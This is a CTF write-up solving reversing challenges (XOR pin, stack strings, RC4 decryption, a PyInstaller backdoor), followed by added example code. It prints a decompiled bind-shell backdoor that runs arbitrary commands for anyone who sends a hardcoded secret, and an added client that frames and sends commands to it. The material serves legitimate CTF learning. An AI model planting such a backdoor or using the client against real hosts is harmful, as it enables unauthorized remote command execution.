nyaarch64
Posted on May 5, 2022
I participated in Synack Red Team Five CTF. I solved all 25 challenges and placed 13th out of 333 teams.
You can get challenge descriptions and downloadable files from Hilb3r7/synack-red-team-five-ctf.
reversing
Used tools: Ghidra
Access
Decompile it and find "Access Granted! Submit pin in the flag format." in the main function.
In the checkpin function the pin is compared character by character against (&DAT_00102014)[i] ^ 0x20.
DAT_00102014 is \x4c\x13\x54\x7f\x4d\x45\x7f\x11\x4e\x7f\x4c\x13\x54\x7f\x4d\x45\x45\x45\x45\x7f\x49\x4e\x01\x01\x00
XOR each byte with 0x20 (the trailing \x00 is the string terminator) and it becomes l3t_me_1n_l3t_meeee_in!!
In flag format that is HTB{l3t_me_1n_l3t_meeee_in!!}, which is the flag.
Check
Decompile it and find many local variable assignments in the main function.
This is the stack strings technique: the string is assembled on the stack from immediate constants, so it never appears as one contiguous string in the binary's data section.
Select the local_58 variable, right click it, select Retype Variable and enter char[32].
Now we can see the secret, ch3ck_anD_r3checK_aga1n!.
According to the printf format "Welcome Agent, heres's a small gift: HTB{%s}\n", the flag is HTB{ch3ck_anD_r3checK_aga1n!}.
Split
Decompile it and correct the types and names of a few items:
- local_88 = "v!7Xf-;.2=1/";
- the decrypt, sub1, sub2 and sub3 functions
- the DAT_00102008 value
Read these functions and reimplement them in Python. The init loop and the decrypt loop are RC4's key-scheduling and keystream-generation steps, with local_88 as the key and DAT_00102008 as the ciphertext:
buffer = []
out_buf = ""
for i in range(256):
    buffer.append(i)
local_18 = 0
ctx = "v!7Xf-;.2=1/"  # local_88, the key
out = [  # DAT_00102008, the ciphertext (the trailing 0x00 is the C string terminator)
    0x9f, 0x69, 0x43, 0x1b, 0x90, 0x12, 0x96, 0x7a, 0x23, 0x76, 0x8f, 0x2e, 0x9e,
    0x9f, 0xeb, 0x23, 0x40, 0xed, 0xbd, 0x7a, 0x4b, 0x99, 0xf6, 0xa0, 0x0c, 0x00,
]
ctx_len = len(ctx)
# Key scheduling: 256 swaps driven by the key (RC4 KSA)
for i in range(256):
    iVar1 = ord(ctx[i % ctx_len]) + buffer[i] + local_18
    # The compiler's idiom for a signed `% 256`; every term is non-negative
    # here, so this is just iVar1 & 0xff
    uVar2 = (iVar1 >> 0x1f) >> 0x18
    local_18 = (iVar1 + uVar2 & 0xff) - uVar2
    tmp = buffer[i]
    buffer[i] = buffer[local_18]
    buffer[local_18] = tmp
print(buffer)  # the permuted S-box
out_len = len(out)
local_24 = 0
local_20 = 0
# Keystream generation and XOR with the ciphertext (RC4 PRGA)
for i in range(out_len):
    local_24 = (local_24 + 1) & 0xff
    local_20 = (local_20 + buffer[local_24]) & 0xff
    tmp = buffer[local_20]
    buffer[local_20] = buffer[local_24]
    buffer[local_24] = tmp
    out_buf += chr(out[i] ^ buffer[(buffer[local_20] + buffer[local_24]) & 0xff])
print(out_buf)
Execute it and get the flag HTB{d0_th1s_oR_do_th47!?}.
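Because the two loops are textbook RC4, the same result comes out of a general routine once you recognise the pattern (256-entry table initialised to 0..255, key-driven swaps, then the i/j swap-and-lookup loop). Below is an added example, not code from the writeup: a standalone rc4() checked against the public RC4 test vectors ("Key"/"Plaintext", "Wiki"/"pedia", "Secret"/"Attack at dawn"), applied to the key and ciphertext listed above. The helper names are my own.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) then keystream generation (PRGA).

    Encryption and decryption are the same operation, so this both recovers
    the challenge plaintext and reproduces the standard test vectors.
    """
    # KSA: the decompiled init loop (S[i] = i, then 256 swaps driven by the key).
    S = list(range(256))
    j = 0
    for i in range(256):
        # The decompiler's "(x >> 0x1f) >> 0x18" dance is the compiler's signed
        # modulo 256; with non-negative operands it is simply & 0xff.
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    # PRGA: the decompiled decrypt loop, one keystream byte per input byte.
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xff])
    return bytes(out)


# Key (local_88) and ciphertext (DAT_00102008) as listed in the writeup above;
# the final 0x00 is the C string terminator of the encrypted buffer.
CHALLENGE_KEY = b"v!7Xf-;.2=1/"
CHALLENGE_CT = bytes([
    0x9f, 0x69, 0x43, 0x1b, 0x90, 0x12, 0x96, 0x7a, 0x23, 0x76, 0x8f, 0x2e, 0x9e,
    0x9f, 0xeb, 0x23, 0x40, 0xed, 0xbd, 0x7a, 0x4b, 0x99, 0xf6, 0xa0, 0x0c, 0x00,
])


def decrypt_challenge() -> str:
    """Decrypt the challenge buffer and cut at the NUL, as the binary's printf would."""
    plain = rc4(CHALLENGE_KEY, CHALLENGE_CT)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


if __name__ == "__main__":
    print(decrypt_challenge())
```

Checking a suspected stream cipher against its published test vectors before trusting the recovered plaintext is cheap and catches off-by-one mistakes in the j update or the swap order, which otherwise produce plausible-looking garbage.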
Knock Knock
It's a PyInstaller binary. (I had used one once before, so I recognized it just by checking the file.)
Use https://github.com/extremecoders-re/pyinstxtractor to extract the archive of Python modules embedded in the binary (by running python pyinstxtractor.py ./backdoor);
many .pyc files are extracted.
Find src.pyc. Its header marks it as Python 3.9, so https://github.com/rocky/python-uncompyle6/ refuses to decompile it.
But the challenge information says it's Python 3.8, so I wrote a hello-world Python script and compiled it with Python 3.8.
The resulting .pyc starts with the magic byte \x55: Python 3.8's pyc magic number is 3413 (0x0D55, written little-endian followed by \r\n, i.e. 55 0d 0d 0a), while Python 3.9's is 3425 (0x0D61).
Change the first byte of src.pyc from \x61 to \x55 and decompile by running uncompyle6 backdoor-src.38.pyc > backdoor-src.py
backdoor-src.py is:
import socket
from hashlib import md5
from subprocess import check_output

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 4433))
sock.listen(5)
while True:
    client, addr = sock.accept()
    data = client.recv(32)  # the 32-character hex MD5 of the secret
    if len(data) != 32:
        client.close()
    else:
        if data.decode() != md5(b't0p_s3kr3t').hexdigest():
            client.send(b'Invalid')  # as decompiled, it neither closes nor skips the command
        size = client.recv(1)  # one-byte command length
        command = client.recv(int.from_bytes(size, 'little'))
        if not command.startswith(b'command:'):
            client.close()
        else:
            command = command.replace(b'command:', b'')
            output = check_output(command, shell=True)  # arbitrary shell command execution
            client.send(output)
            client.close()
Just read it: the secret is the MD5 hex digest of 't0p_s3kr3t', '8f4328c40b1aa9409012c7406129f04b'.
After sending it, the server reads a one-byte length and then a command; anything following 'command:' is executed with check_output(shell=True) and the output is sent back. Note that, as decompiled, a wrong digest only earns an 'Invalid' reply; the code goes on to read and run the command anyway.
(I thought I had saved a screenshot of this but I didn't...
so basically I lost the flag and the commands I executed...)
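To talk to the backdoor without hand-crafting the framing, here is an added example that is not part of the writeup: a client that frames one request as the decompiled server expects (32-byte hex digest, a one-byte little-endian length, then b'command:' plus the command), and a loopback stand-in for the server that follows the same framing but replaces check_output with a constructed responder so the exchange runs offline. Only the framing comes from the listing above; the host, port, function names and the fake responder are assumptions. One consequence of the one-byte length field worth knowing before you type a long command: the payload, 'command:' prefix included, cannot exceed 255 bytes.

```python
import hashlib
import socket
import threading

# 32 ASCII hex bytes, exactly what the server's recv(32) compares against.
SECRET_DIGEST = hashlib.md5(b"t0p_s3kr3t").hexdigest().encode()


def build_request(command: bytes) -> bytes:
    """Frame one request: digest, 1-byte little-endian length, b'command:' + command."""
    payload = b"command:" + command
    if len(payload) > 255:
        raise ValueError("payload must fit the 1-byte length field (<= 255 bytes)")
    return SECRET_DIGEST + bytes([len(payload)]) + payload


def send_command(host: str, port: int, command: bytes, timeout: float = 5.0) -> bytes:
    """Connect, send one framed request, collect the reply until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(command))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def _fake_backdoor_once(srv: socket.socket, executor) -> None:
    """Server side, mirroring the decompiled framing but calling `executor`
    instead of check_output, so nothing is executed on this machine."""
    client, _ = srv.accept()
    with client:
        data = client.recv(32)
        if len(data) != 32:
            return
        if data != SECRET_DIGEST:
            client.send(b"Invalid")  # as decompiled: the server carries on regardless
        size = client.recv(1)
        command = client.recv(int.from_bytes(size, "little"))
        if not command.startswith(b"command:"):
            return
        client.sendall(executor(command.replace(b"command:", b"")))


def fake_executor(cmd: bytes) -> bytes:
    """Constructed stand-in for check_output(cmd, shell=True)."""
    return b"[fake output for: " + cmd + b"]\n"


def demo_exchange(command: bytes = b"id") -> bytes:
    """Run client and fake server on loopback and return what the client received."""
    srv = socket.socket()
    srv.settimeout(5.0)
    srv.bind(("127.0.0.1", 0))  # ephemeral port, no clash with a real listener
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=_fake_backdoor_once, args=(srv, fake_executor))
    t.start()
    try:
        return send_command("127.0.0.1", port, command)
    finally:
        t.join()
        srv.close()


if __name__ == "__main__":
    print(demo_exchange(b"id").decode())
```

Against the real target you would call send_command(host, 4433, b"cat flag.txt") and save the reply; the one-shot framing means each command is a fresh connection.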